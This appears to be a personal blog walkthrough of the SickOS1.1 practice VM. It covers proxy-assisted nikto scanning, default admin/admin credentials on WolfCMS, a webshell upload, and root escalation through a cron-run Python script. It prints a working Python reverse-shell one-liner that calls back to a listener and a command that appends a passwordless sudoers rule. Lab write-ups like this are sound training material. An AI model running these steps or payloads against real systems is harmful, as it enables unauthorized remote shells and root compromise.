SickOS1.1

SickOS1.1

  1. Nmap scan -> 22 (ssh), 3128 (http-proxy Squid), 8080 (closed http-proxy)
  2. Started ncrack on the ssh port
  3. Ran nikto on the http proxy
nikto -h 192.168.1.210 -useproxy http://192.168.1.210:3128
  1. Configure my browser the connect through proxy.
  2. Go to view the webpage and this is what I see…

C:\Users\Graham\AppData\Local\Microsoft\Windows\INetCache\Content.Word\Bleehhh.jpg

  1. In the nikto scan I saw the words robot.txt, no idea what it meant but I typed it in anyway
    • Disallow: /wolfcms/
  2. Navigated to that directory and found a blog type thing.
  3. Started researching some wolfcms stuff and found a list of “default directories”
  4. An ?admin page was one of them. Found a login page.
  5. The blog is still very new

C:\Users\Graham\Pictures\SickOs Writeup\Blog.png

  1. Because it’s new I google around for the default user and pass of the login page.
    • Looks like it is admin/admin
      1. Shoulda probably tried that myself…
  2. Land on a weird looking page.

C:\Users\Graham\Pictures\SickOs Writeup\admin page.png

  1. After navigating a little bit I find a file upload function.
    • Have never done any file upload stuff so I started researching really quick.
    • My first thoughts are a webshell
  2. Apparently a webshell is exactly what I was supposed to do.
    • (thankfully)
  3. After navigating to my trusty webshell page I now have a shell onto www-data user

C:\Users\Graham\Pictures\SickOs Writeup\Shell.png

  1. Now for some priv escalation.
  2. Check crontab -l
    • Doesn’t show anything…
  3. Apparently there are a bunch of ways for checking to cronjobs
    • /var/spool/cron/*
    • /etc/crontab/
    • /etc/cron.d/*
    • /etc/cron.hourly, /etc/cron.daily, /etc/cron.weekly, /etc/cron.monthly
  4. Cron.d shows me that connect.py is run as root! So now what….
  5. So I know that connect.py is run and… I can echo stuff to it…
  6. So if I just put the right stuff in there I should get a shell I think…
  7. Tried pasting this in and waited but got some weird error whenever I tried to sudo.
    • I think this didn’t work because the cronjob runs it in python
      1. Derp…
echo "www-data ALL=(ALL) NOPASSWD:ALL" >> /etc/sudoers > shell.sh
  1. Started googling other things I could throw in there to make it work.
    • Found a python reverse shell script I want to try.
import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('192.168.1.185',36807));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(['/bin/sh','-i']);
  1. After a ton of tweaking, I finally got the above string to echo into connect.py.
    • Ran python connect.py to see if it would give me a user shell (it did)
    • Now I just had to wait.
  2. About 30 seconds later, I got my shell.

C:\Users\Graham\Pictures\SickOs Writeup\Completed.jpg

Leave a Reply

Your email address will not be published. Required fields are marked *